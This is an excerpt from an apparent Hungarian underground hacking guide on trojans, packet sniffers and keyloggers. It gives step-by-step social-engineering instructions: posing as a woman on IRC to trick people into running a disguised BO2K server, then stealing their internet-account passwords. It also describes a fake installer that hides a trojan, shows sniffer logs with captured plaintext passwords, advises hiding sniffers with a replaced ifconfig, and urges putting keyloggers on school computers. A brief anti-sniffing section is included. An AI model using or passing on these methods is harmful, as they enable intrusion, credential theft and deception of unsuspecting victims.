feltölthetsz az áldozat gépére (fájlokat, vírusokat, más trojai programokat, stb.) és futtathatod is ezeket. Néhány a közelmultban megjelent trojai programban már beépített funkció az egyszeru formázás az áldozat gépén (Format c:\) Ennek segítségével teljesen le tudod törölni merevlemezének tartalmát. Az új, hatásosabb változatok segítségével listát kérhetsz az eltárolt kódokról (password) és így például megtudod szerezni az o kapcsolt vonalas internetszolgáltatásának azonosítóját és kódját is. Néhány nagyon kellemetlen, mások számára idegesíto funkciót is tartalmaznak mint például a rejtett
95
Hackers’ Guide
egér, egér irányítás, cd olvasó kinyitása és bezárása, windows újraindítása, Internet Explorerben vagy Netscapeben URL azonnali megnyitása, képek megjelenítése az áldozat gépén, jegyzettömb tömeges megnyitása meg efféle jópofa dolgok (persze ez csak a lamerekkel fordul elo). Ez nem annyira káros, de eléggé fel tudja az illetot bosszantani. 2. Hogyan is muködnek ezek a programok? Amikor a lamer gépén fut a trojai szerver része, akkor egy speciális portot nyit meg, amire bárki felcsatlakozhat. Ehhez kellenek általában a port scannerek, melyek segítségével megtudhatjuk a nyitott és a foglalt portokat. Természetesen te a porton keresztül trojai szerveréhez csatlakozol és vele kommunikálsz, nem pedig közvetlenül a géppel, egyszerubben csak azokat az utasításokat adhatod ki, amiket a trojai is tartalmaz. Az áldozat gépén a trojai úgy viselkedik, mint egy vírus, mert ez is memóriarezidens. Többféle képpen muxik az önindítás. Egyrészt beírják magukat a Windows könyvtárban található win.ini illetve system.ini fájlban vagy pedig a windows regisztrációs adatbázisába piszkítanak. Nehány trojannal (pl. ICQHack, ICQSpy stb.) akár a vonal másik végén lévo egyén ICQ UIN számát, azonosító kódját, kapcsolatainak listáját, az összes fogadott és küldött üzenet megismerhetjük. A hozzáértobbek teljes pusztítást is képesek végrehajtani ezekkel a vírusokra hasonlító programokkal. Néhány buta ember azt hiszi, hogy a hacker szinte semmihez nem tud hozzáférni egy kapcsolódás után, pedig ez nem így van. Egy profi támadás következtében szinte minden fontos személyes infót meg lehet szerezni, ami csak a számítógépen van, mitpéldául:
96
•
Bankkártya információkat
•
Banki információkat
•
Azonosítási információkat
•
Levelezolistákat
•
Azonosítókat és kódokat
•
Személyes címet és adatokat
•
E-mail fiókokat
•
Otthoni iroda / Kisvállalokozás információit
•
Vállalati azonosítókat ezálltal különbözo szolgáltatásokhoz hozzáférést
•
Személyes e-mail levelekbe beletekintést
•
Te és családtagjaid vezeték és utónevét
•
Gyerekeid nevét és életkorát
•
Otthoni címedet
•
Telefonszámodat
•
Leveleket, amiket te másoknak írtál pl. Wordben
Hackers’ Guide •
Családi képeidet
•
Iskolai munkákat
•
Más iskolai azonosítót / információt
Szerintem nem örülnél, ha valaki betörne hozzád és személyes dolgaidat internetes oldalakon keresztül közölné másokkal. Minden nap megszállott tempóban készítik a programozók az újabb, jobb, több funkciós, jobb rejtozködo technikájú trojai programokat és ezzel egyidoben készülnek az ellenszerek (anti-trojan) is. Muszakilag a trojai programok minden operációs rendszer illetve platform alatt képesek muködni. Biztos információ soha sincs a trojanokról, hogy mennyi van belolük, mennyien vannak megfertozve stb. stb... Csak egy biztos, az, hogy érdemes védekezni, ha nem akarunk a dokumentumban leírtak szerint pórul járni és persze a legjobb védekezés a támadás, Hannibált is saját módszereiven gyozték le Zámánál!
************************************************************************************************
Pár szó a trojai programokról A neve a történelemből fakad. Pár évvel ez elött a görögök ajándékba adtak egy falovat az ellenségnek, amiben benne lapult a sok rohambilis. Éjjel mikor senki sem figyelt, kijöttek és átvették az irányitást. Nnna.....ezek a programok valami hasonlóra képesek (persze megfelelő védelem hiányában). Van egy server és egy client része. Ha valakinél Te is át akarod venni az irányitást, akkor futtatnod kell a servert. Ezeket át lehet nevezni, és az ikon is valamilyen rendszer fájlra hasonlit. A windows futása közben nem lehet törőlni őket, mert alkalmazásban vannak. Léteznek olyan trojaik, amik a server installálása után a megadott cimre kűldenek e-mailt az áldozat ip-je és egyéb fontos info-val együtt. Ha megvan az ip, akkor azt ird be a cliens-be, és kapcsolodj rá. Ha nem sikerűl, azt látni fogod. Ha rajta vagy, onnan tied a világ. Tudsz törőlni; bármit fel-le tölteni; kikapcsolni gépet, monitort; programokat leállitanielinditani; hátteret változtatni; felszavakat lopni; egeret manipulálni; FTP-n kapcsolodni; böngészőt elirányitani és ez csak a töredéke amire ezek képesek. DE megfelelő védelemmel, letudod ütni magadról a támadást, sőt még detektálni is lehet a támadót. A működési elvük, hogy elinditás után bizonyos portokat megnyitnak és azok a kapcsolódásra várnak. Néhány trojan ujra inditja a gépet, de az újak már a registry-t használják. Hogyan használjuk EREDMÉNYESEN a trojai programokat? A leghasznosabb számunkra a 'system/list passwords' opció ... ez kiírja a számítógépen tárolt jelszókat, így a minket érdeklő internet-hozzáférés "username/password" - jét is. A dolognak egyetlen szépséghibája van ... a szerver file-t valahogy fel kell juttatnuk a célgépre: ez kétféleképpen tehetjük meg, az
97
Hackers’ Guide
egyszerubb, ha fizikai hozzáférésünk van a géphez, mondjuk ez véleményem szerint elég ritka. A másik lehetoség interneten, leginkább irc-en keresztül 'rávenni' áldozatunkat, hogy vegye át a file-t, és futtassa le :) Itt jön a dologba egy kis nehézség ... ki az a hülye, aki bármit is elindít a gépén anélkül, hogy tudná, mi az. Meg kell nyugodni, vannak ilyenek. Az elso lépés az, hogy felmegyünk ircre. A legfontosabb az, hogy noi néven!!! :) Valami igencsak jó nore utaló nevet kell választani (pl. Niki vagy valami ilyesmi). Aztán következik egy kelloen lamer csatorna kiválasztása, tehát nem valami hack-channel, hanem pl #magyar, #hungary ... ahol biztos vannak olyanok akik beszívnak egy ilyet ... Ezután ne csináljuk semmit! Ne beszéljünk, ne /msg - zünk senkivel! Nem kell sokat várni (max 1 perc), és alig bírjuk majd bezárni az msg ablakokat :) A sok kanos tag csak úgy eláraszt a kampó kérdésekkel (pl. Szia, hogy vagy? Szeretsz baszni? - meg ilyenek). Válasszunk ki egyet, akinek a hostja az általunk preferált ISP-jé, pl dial31.kamponet.hu, ha a kamponetre akarunk accountot. Ekkor kezdjünk el vele pofázni. Lényeg az, hogy ne derüljön ki, hogy fasz van a lábunk között ... :) A leendo accountunkról érdeklodhetünk az alábbi kérdéssel: - Gyakran vagy itt? VAGY - Minden nap itt vagy? innen megtudjuk, hogy korlátlan - e az account. Beszélgessünk egy kicsit, aztán amikor képet kér rólad (biztos fog!), dcc-zük el pl. a kep.rar filet, ami tartalmazza a bo2k sever file-t, átnevezett állapotban pl. kep.exe-re (a server file 114K). Átveszi, lefuttatja, és két eset lehetséges: kitömörítés után vagy elkezd kurvaanyázni - ekkor a vírusírtója (pl AVP monitor) beszólt, hogy bo2k veszély van ... általában azonban nem tudják az emberek mi ez, csak azt hiszik valami vírus. Ekkor fontos, hogy ne azt mondjuk, hogy 'bazzeg nem szívtad be', hanem valami olyasmit, hogy 'majd szólok a bátyámnak hogy szerelje meg' :) vagy valami hasonlót ... kérjünk bocsánatot, meg minden, és ha lehet pofázzunk még vele. Jobbik estet (mármint számunkra nyero), ha elindítja, és azt mondja, hogy 'nem muködik'. Ekkor nekünk kurvára jó, mert felkonnektelünk a gépére, és simán lenyúljuk a jelszó(ka)t. Ezek után is beszélgessünk még vele, mert így egyáltálán nem lesz feltunő. Bármilyen nagy a kísértés, NE rebootoljunk neki, én már párszor megtettem, és a paraszt miután visszajött beszólt nem msg-be a csatin, hogy mi a helyzet, valaki szívózik :) Általam gyakrabban alkalmazott módszer, hogy nem képnek adom ki a server file-t. (ha képet kérnek azt mondom, hogy 'nincs a számítógépen' - ez nagyon 'lányosan' hangzik ... :)) Kis beszélgetés után (kb 5 perc) térjünk rá a lényegre, kérdezzük meg tole, hogy van-e kedve sakkozni, amobázni, vagy amit akarunk ... ha azt mondja, hogy igen, csak hogyan, mondjuk azt eloször, hogy 'interneten keresztül' - ez szinén elég picsásan hangzik. NAGYON fontos, hogy kérdezzük meg, hogy megvan-e neki a játék! (ez egy kurva jó kérdés, bazzeg!!!) Így minden gyanúja elszáll, hogy szivatni akarjuk. Persze nincs meg nekik, tehát ajánljuk fel, hogy elküld- jük :) ... Ekkor ugyan az a 2 eset áll fenn, mint a képesnél, ezt nem írom le mégegyszer. Szintén ha nem megy nekik, beszélgessünk még utána ...Ha elég ügyesek vagyunk és jól csináljuk, egy hétvége délután (ekkor iszonyú sok lamer vann benn, tehát jobb, mint az este) mondjuk 3 tól 7ig körülbelül 15 accot tudunk szerezni ... nem is rossz!! Mindig nézzük meg az online eltöltött idot a szolgáltató oldalán, innen megtudjuk (az elozo hónapiból, mondjuk) hogy hány órás az acc. Én csak a végteleneket használtam, nem vagyok paraszt, hogy mások fizessenek az én szórakozásomért ... :) tehát csak ezeket használd. Minden nap másikat!!! Így viszonylag elkerülöd a lebukás lehetoségét is.Ha valami olyan szolgáltatóra szereztünk accountot, ami a mi körzetünkben még nem épült ki (foleg vidékiek, mint pl. én), akkor keressünk egy olyan valakit, aki ott lakik, ahol már ott van az isp, és ha neki is van pár elfekvo accja, ami meg neki nem kell, akkor el lehet csere-berélni is oket.Ha sikerült valami
98
Hackers’ Guide
korlátlan hozzáférést szerezni, nézzük meg, hátha pl. csak hétvégén vannak bent vele, így hétköznap nyugodtan használhatjuk.Fontos még megjegyeznem, hogy én ezt már nem csinálom, csak régebben, amikor még nem volt legal accountom. Ha kipróbáljátok, semmilyen felelosséget NEM vállalok, viszont saját tapasztalatból tudom, hogy az emberek kb 60%a szívja be. Lehet próbálkozni ... from ww187 / rBL2k A kérdes adott: hogy hogyan juttasunk fel egy trojan szervert a target gépre. Irc-n nehéz elsózni. Ha a progi amit lekűldesz nem csinal semmit, akkor a lámma gyanakodhat. Itt jon a trükk. Kepzeld el a játek directory-t. van benne egy pár .dat .dll akármijen file, meg egy setup.exe nevű is. Átnevezed a trojan szerver-t mongyuk akarmi.dll -nek, és a játekprogram .exe -t pedig valami.dat -nak Szoval a setup.exe azt csinalja, hogy ezt a két fajlt visszanevezi exe -nek, aztán futtatja a trojant, majd közli hogy az installacio sikeres volt, és rákérdez hogy futtatod-e a játekot. Ha igen, akkor elinditja a játekot, vagy mindegy mit, mert akkor már régen a gépen van a lényeg, és abszolut nem tűnik fel neki semmi. Hacsak nem nyögi be valami virusirtó, vagy akármi, hogy gáz van...:) Quentin0
************************************************************************************************
Snifferek Némi bevezető… Érdemes ezekről a programokról is írni egy keveset, mivel a legtöbb tömeges accszerzést ennek segítségével hajtották végre (pl. legutóbb az (első) L&R törésnél, ahol a kb. 2500 password-öt néhány hét sniffelés eredményeként kapták). A miatt is érdemes beszélnünk róla, mivel a sniffelést kívülről nem lehet detektálni, így azoknak a kezdőknek is bátran ajánlható, akik nem akarnak mazochista módon rögtön a rendszergazdi karmaiba kerülni :( (de erről később).
99
Hackers’ Guide
Mik is a snifferek? Ha a szó angol jelentését megkeressük, akkor minden világos lesz: sniff = szippantás, szimatolás (Itt most nem arra kell gondolni, hogy ha használjuk, akkor jól megszippantjuk, inkább koncentráljunk a második jelentésre, azaz szimatolás.) A snifferek olyan programok (de lehet hardware is), amelyekkel a hálózaton folyó forgalomba szimatolhatunk bele. Ez olyan hálózaton lehetséges, ahol a hálózatba kötött gépek egy fizikai vonalon osztoznak., ahol a vonalra feltett info bárki számára fizikailag elérhető. Ennek remek példája pl. az Ethernet hálózat. Az Ethernet ui. úgy működik, hogy a hálózatba kötött gépek az adatokat nem egy darabban, hanem csomagokra bontva (frame-ek) küldik el egymásnak. A drótra feltett adatcsomagokat minden Ethernet-kártya mintavételezi, és ha valamelyik kártya ráismer a saját fizikai címére az adott csomagban akkor beolvassa és továbbítja az őt meghajtó programoknak (talán emlékeztek 7 rétegű OSI modellre). De szerencsére át lehet a hálózati interface-t állítani olyan üzemmódra, hogy válogatás nélkül minden csomagot beolvasson, ezt a 'Promiscuous mode'. (A promiszkuitás szó azt hiszem mindenkinek ismerős :)). Ezzel a beállítással elvileg az Etherneten folyó teljes adatforgalom lehallgatható. Felhasználás Ezt a funkciót nyilván nem arra a célra hagyták az Ethernet hálózatban bárki kedvére garázdálkodjon, hanem elsősorban diagnosztikai célból. Lehet a hálózati forgalmat mérni vele, vagy hálózati hibakeresésre is használható. De előszeretettel használják a rendszergazdik olyan csúnya, gonosz módszerek :) kiderítésére, mint pl. a spoofolás. A sniffelés az Etherneten kívül más hálózatokon is lehetséges, tetszőleges hálózati protokollt figyelhetünk vele, de én most csak az Ethernet és a TCP/IP sniffelés ismertetésére szorítkozom (a többit nem ismerem annyira, nem mintha ezt hű de nagyon ismerném). Mi kell hozzá? - 1 Ethernet hálózat, amihez fizikailag hozzákapcsolódtunk - 1 saját IP cím, ami ehhez a hálózathoz tartozik - Nem árt egy jó sniffer program sem (írhatunk is egyet, ha van elég önbizalmunk). - Jó sniffer programot én csak UNIX-ra láttam, úgyhogy valamilyen LINUX + gcc fordító - Root jog ezen a Linuxon, a PROMISC mód bekapcsolásához. A sniffereket végrehajtható program formájában vagy forráskódban tölthetjük le (személy szerint a forráskódút preferálom, szeretem tudni, hogy mit csinálok). Futtatáskor találkozhatunk néhány problémával. A sniffer mintavételezi a hálózatot. Gyors vagy terhelt hálózaton nem várhatjuk azt, hogy a sniffer az összes hálózati csomagot képes lesz begyűjteni nekünk, mivel a beolvasott csomagok feldolgozása is időt igényel, és ez alatt a hálózaton folyik a forgalom. Másrészt a begyűjtött csomagok nagy mennyisége miatt a tárolás és értelmezés sem mindig egyszerű. Egy sniffer akkor jó, ha a beolvasott csomagokat képes szűrni. TCP/IP hálózatban az IP csomagokat a forrás és cél IP-cím alapján érdemes szűrni. Ha ezek TCP (vagy UDP) csomagok, akkor még érdemes a TCP-kapcsolat forrás és cél portcímét is
100
Hackers’ Guide
figyelembe venni. Ha password-szerzésre specializáljuk a sniffert, akkor további finomítás lehet az, ha csak a kapcsolat első néhány első csomagját tároljuk (pl. a linsniffer ezt teszi). Így csökkenthető a tárolt adatok mennyisége. A snifferek kimenete általában a standard kimenetre megy de file (ok)ba is kérhetjük az eredményt. A szűrés mellett a logolási szint beállíthatósága is fontos lehet. A snifferek általánban kiírják az elkapott csomagok header-infoját olvasható formára alakítva, (IP, TCP, UDP header), és a csomagokban szállított adatokat is. Néhány példa: ----------------------------------------------------------------------------------------------1 . Már nem is tudom melyik sniffer (talán Sniffit 0.3.5 ???; próbáljátok ki az összeset :( ): TCP Packet ID (from_IP.port-to_IP.port): 192.168.66.1.513-192.168.66.66.1023 SEQ (hex): 19B24FC4 ACK (hex): 223EE67F FLAGS: -AP--- Window: 3C00 Packet ID (from_IP.port-to_IP.port): 192.168.66.1.513-192.168.66.66.1023 45 E 10 . 00 . 29 ) 29 ) B7 . 40 @ 00 . 3F ? 06 . 0C . 74 t C0 . A8 . 42 B 01 . C0 . A8 . 42 B 42 B 02 . 01 . 03 . FF . 19 . B2 . 4F O C4 . 22 " 3E > E6 . 7F . 50 P 18 . 3C < 00 . F6 . 02 . 00 . 00 . 00 . TCP Packet ID (from_IP.port-to_IP.port): 192.168.66.66.1023-192.168.66.1.513 SEQ (hex): 223EE67F ACK (hex): 19B24FC1 FLAGS: -AP--- Window: 7C00 Packet ID (from_IP.port-to_IP.port): 192.168.66.66.1023-192.168.66.1.513 45 E 00 . 00 . 34 4 31 1 01 . 00 . 00 . 45 E 06 . 3F ? 2F / C0 . A8 . 42 B 42 B C0 . A8 . 42 B 01 . 03 . FF . 02 . 01 . 22 " 3E > E6 . 7F . 19 . B2 . 4F O C1 . 50 P 18 . 7C | 00 . 42 B 1E . 00 . 00 . FF . FF . 73 s 73 s 00 . 19 . 00 . 50 P 00 . 00 . 00 . 00 . TCP Packet ID (from_IP.port-to_IP.port): 192.168.66.1.513-192.168.66.66.1023 SEQ (hex): 19B24FC5 ACK (hex): 223EE68B FLAGS: -A---- Window: 3C00 Packet ID (from_IP.port-to_IP.port): 192.168.66.1.513-192.168.66.66.1023 45 E 10 . 00 . 28 ( 29 ) B8 . 40 @ 00 . 3F ? 06 . 0C . 74 t C0 . A8 . 42 B 01 . C0 . A8 . 42 B 42 B 02 . 01 . 03 . FF . 19 . B2 . 4F O C5 . 22 " 3E > E6 . 8B . 50 P 10 . 3C < 00 . F5 . FE . 00 . 00 . ----------------------------------------------------------------------------------------------2. Pálda password megszerzésére: snoop from Sun pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1030 cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1030 [1] 2977\r\ncs:/user/f pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1030 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188
101
Hackers’ Guide
cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 \r\n\r\nUNIX(r) System V pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 Itt jön a felhasználó (calvin), az echozás miatt duplán. pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 c cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 c pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 a cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 a pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 l cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 l pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 v cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 v pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 i cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 i pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 n cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 n pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 … na és a password cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 Password: pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 T cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 i cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 g cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 e cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 r cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 7 cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 102
Hackers’ Guide
pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 = cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 $ cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 Last login: Mon Aug pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 …. satöbbi 3. sniffit for UNIX 203.252.195.1.110-203.252.195.191.1297 203.252.195.1.20-203.252.195.2.1034 203.252.195.1.20-203.252.195.2.1035 203.252.195.1.21-203.252.195.2.1033 203.252.195.1.23-203.252.195.2.1032 203.252.195.1.23-203.252.195.65.1030 203.252.195.191.1297-203.252.195.1.110 203.252.195.2.1032-203.252.195.1.23 203.252.195.2.1033-203.252.195.1.21 203.252.195.2.1034-203.252.195.1.20 203.252.195.2.1035-203.252.195.1.20 203.252.195.65.1030-203.252.195.1.23 cs# more 2* :::::::::::::: 203.252.195.1.110-203.252.195.191.1297 :::::::::::::: +OK QUALCOMM Pop server derived from UCB (version 2.1.4-R3) at cs starting. +OK Password required for hrshin. +OK hrshin has 0 message(s) (0 octets). +OK 0 0 +OK Pop server at cs signing off. :::::::::::::: 203.252.195.191.1297-203.252.195.1.110 :::::::::::::: USER hrshin PASS shr1234 STAT QUIT :::::::::::::: 203.252.195.1.21-203.252.195.2.1033 :::::::::::::: 220 cs FTP server (UNIX(r) System V Release 4.0) ready. 331 Password required for rhee. 230 User rhee logged in. 200 PORT command successful. 150 ASCII data connection for /bin/ls (203.252.195.2,1034) (0 bytes).
103
Hackers’ Guide
226 ASCII Transfer complete. 200 PORT command successful. 150 ASCII data connection for certcc-msg (203.252.195.2,1035) (764 bytes). :::::::::::::: 203.252.195.2.1033-203.252.195.1.21 :::::::::::::: USER rhee <<< itt a lényeg :) PASS Quick297 PORT 203,252,195,2,4,10 LIST PORT 203,252,195,2,4,11 RETR certcc-msg QUIT :::::::::::::: 203.252.195.1.20-203.252.195.2.1035 :::::::::::::: 1ö°íÇI1E´I´U. Aú´Â 1÷¸í?©´ë Aü"eÇ?°ú 1A1oAU°ü¸®AÚAÔ´I´U. AYoeó?iAú "ó?!1 ?ÂóAÎ 1AAY3î ´ÚAÍ o¸3E Á!°ËA" ?äA"ÇI?´A¸3a °e1Ó 3A·!?Í °°Ao ¸?1AÁö¸¸ ߸é1 Á!°ËA" °AoδçÇI°í AÖ1A´I´U. ….. ….. … satöbbi, a többi minket már nem érdekel. Ha IP-csomag vizsgálatot végzünk, vagy spoofolást figyelünk, nyilván minden fejinfóra szükségünk lehet. De remek móka az is amikor ráállunk egy TELNET kapcsolatra (szürési feltétel: forrás IP cím a kliens vagy a szerver, és a forrás vagy cél port 23), és nem kérünk fejinformációt, csak a küldött adatokat.. Ha ugyanazt a típusú terminált használjuk, mint az áldozat, akkor a képernyőn (majdnem) pont azt látjuk, mint amit ő, nyomonkövethetjük, hogy mit csinál úgy, mintha a terminálja előtt ülnénk. A sniffereket általában forráskóddal együtt tudjuk letölteni, és nem mindegyik fordul le rögtön mindegyik Linux destribución (,pl. amit eleve nem Linuxra készítettek). Ha a hordozhatóság szempont, akkor érdemes olyan sniffert választani, amelyet valamilyen oprendszer-független csomagfigyelő library-vel írtak meg, mert ezt később több rendszeren is le fogunk tudni fordítani, ilyen a sniffit. Ehhez a libpcap (Packet Capture Library) csomagot használták, amely egy többplatformos hálózati csomagfigyelő könyvtár, így a legtöbb UNIX alatt használható. Ha valaki szeret kódbuherátorkodni, de gyorsan szeretne eredményt elérni, annak Linuxra a linsniffer-t vagy a spy_sniff-et ajánlom. Mindkettő C forráskódú és néhány 100 sorból áll. Én pl. a spy_sniff-et alakítottam át saját igényeim szerint, néhány fícsör: - több szűrési feltételt is megadhatok, az ezekben szereplő címek AND, OR kapcsolatban állhatnak - több logolási szint, a teljes header info megjelenítésétől a 'csak adat megjelenítése'
104
Hackers’ Guide
szintig - az elkapott csomagok kapcsolatok szerinti rendezése file-okba Még nincs készen teljesen, de ha jól viselkedtek, akkor valamikor később ezt is elérhetővé teszem. További ötleteket szívesen fogadok. Detektálhatóság Már az elején írtam, hogy a sniffereket melegen (nem kell rosszra gondolni :)) ajánlhatom kezdőknek, mivel ha saját gépen futtatják, akkor ez kívülről nem vehető észre. A sniffer ugyanis csak gyűjti a csomagokat a hálózatról, a hálózat felé semmilyen kimenete nincs. Így annak a gépnek a kivételével, ahol futtatjuk, más gépen semmiféle log nem keletkezik. Persze más a helyzet, ha valamilyem más módszerrel már bejutottunk egy olyan gépre, amit snifferrel nem érhetünk el (másik fizikai hálón van), megvan a root, de a saját hálóján lévő többi gépre is be szeretnénk jutni. Ekkor az egyik legegyszerűbb módszer egy sniffer telepítése. Ekkor azonban már észrevehetnek bennünket. A sniffer PROMISC módba nyomja hálózati interface-t, és ezt egyszerű észlelni, pl ifconfig-gal: #ifconfig le0 le0: flags=8863 inet 127.0.0.1 netmask 0xffffff00 broadcast 255.0.0.1 Megoldás lehet, ha lecseréljük az ifconfig-ot (valamilyen Rootkit-ben lehet ilyeneket találni). CSAK ÉSSZEL EZZEL A MEGOLDÁSSAL !!! Minden normális helyen a rendszerfileokat CRC-vel szokás védeni !!! Ha nem vigyázunk a megfelelő szűrésre, vérszemet kapunk és minden csomagot file-ba írunk, akkor a winchy hamar megtelik, és ez még a legbénább rendszergazdinak is feltűnhet. Elárulhat az is, hogy ha a winchy többet jár a kelleténél, így állandóan villog a winchy-LED. Ennek a problémának a kezelésére nem tudok értelmes megoldást :).
Védekezés a snifferek ellen Hogy a mási oldalnak is adjunk némi esélyt, megemlítek néhány módszert arra, hogy hogyan védekezhetünk a sniffelés ellen: - Aktív (Smart) HUB-ok alkalmazása: itt minden gép egy HUB-on keresztül kapcsolódik a másikhoz (csillag). A HUB az egyes ágakra csak azokat a csomagokat küldi el, amelyek az adott ághoz kötött gépnek szólnak. Ekkor maximum csak a saját gépünket sniffelhetnénk, de ez meg kit érdekel :( ? - Titkosított protokollok alkalmazása: pl. SSH, itt minden adat a vonalra kerül, de egy titkosított csatornán keresztül. Az elkapott csomagok olvashatatlanok. - S/Key vagy One Time Password technika alkalmazása: az első esetben a kliens ismeri a passwordöt, de nem ez kerül a vonalra, hanem egy frissen generált kulcsot kap a kliens a szervertől, ezzel megbuzerálja a beütött passwordot, és ezt küldi a 105
Hackers’ Guide
szervernek el. A One Time Password használatoakor a kliens egy password-listát kap, amelyen egyszer használatos password-ök vannak. Meg lehet sniffelni, de semmi értelme :(((. Néhány sniffer Itt most felsorolok néhány programot, linket sajnos nem tudok mellékelni, de megtalálásuk nem jelenthet problémát. Platform 4.3/4.4 BSD FreeBSD NetBSD DEC UNIX DEC Ultrix HP/UX Irix SunOS Solaris SGI Irix Etherman Linux Macintosh DOS
Sniffer tcpdump tcpdump tcpdump tcpdump tcpdump nettl (monitor) & netfmt (display) swatch swatch Herman herfind swatch snoop nfswatch tcpdump linsniffer spy-sniff Etherpeek ETHLOAD The Gobbler LanPatrol LanWatch Netmon Netwatch Netzhack
A Sniffit-et nem írtam sehová, de az ott elérhető, ahol a libpcap csomag megvan. Itt van 2 ql sniffer/forrás tcpdump-3_4 éssniffit_0_3_5 néhány sniffer forrás Szomorú búcsú … Mára ennyit a technika és a tudmány világából … Az általam leírtakkal senkit nem akartam arra buzdítani, hogy az itt ismertetett programokat és módszereket rossz szándékú célra használja (az, hogy mi a 'rossz szándék', annak eldöntését rátok bízom :)), célom az információ szabad áramlásának biztosítása. Ötleteket, hozzászólásokat szívesen fogadok:
106
Hackers’ Guide
BowMan
************************************************************************************************
Keyloggerekről általában Van aki azt se tudja, hogy mi és van aki nap mint nap használja... Ez a cikk szeretné számotokra a keyloggerek által nyújtott lehetőségeket bemutatni a Stealth Keyboard Interceptor Pro 4.00-on keresztül... Tehet sok sikert és minnél több keylogot gyüjteni, hisz az információ hatalom :-)) Összedobta: Nestan [FCF] 1. Mi is az a keylogger? Ahogyan a nevében is benne van loggolja, azaz eltárolja a billentyűzet által közölt adatokat. Elég nagy a választék a keyloggerek terén és ez nem számít vírusnak mint a trojaiak... Persze ezt neked a lamer gépére személyesen kell feltenned vagy ha ügyeskedtél valamelyik trojaival akkor feltöltöd a vinyójára és beüzemeled, persze már van néhány olyan torjan program ami alapban tartalmazza ezt a funkciót... 2. Mire használhatom ezeket a programokat? Mindenre! Nagyon jó, hogy elterjedt a magyar középiskolákban a SuliNet-es internet hozzáférés és a diákok nagyrésze mindíg ott ül a gépek előtt. A lamerek nagytöbbsége, akik egy percig keresik, hogy hol az ESC gomb legtöbbször a Freemail-es illetve más ingyenes e-mail szolgáltatós postafiókjukat innen nézik... Persze, hogy a memóriarezidens keylogger autómatikusan menti és neked nincs más dolgod mint a géped jól eldugott log fájlokat átmásold lemezre és otthon részletesen átböngészd. 3. Hogy is működnek ezek a programok? Nagyjából úgy mint egy vírus, mármint memóriarezidens programok. Te egyszerűen felmásolod vagy a jobb keyloggereknél feltelepíted, beállítod a kódot, hogy mások ne macerálják és tiéd a hatalom :-) A keyloggerek minden indítást regisztrálnak és igény szerint dátumoznak. Az én kollégiumomban kb. egy hónapig volt fent a Skin98... Ennek az lett a vége, hogy az internetező diákok mindegyikének tudtam a kódját... 3. Minden kezdet nehéz... Szóval töltsük le valamelyik underground oldalról (www.keyloggers.com) a progit és a SerialZ 2000-ben pedig nézzük meg a regisztrációs információkat (akinek nem 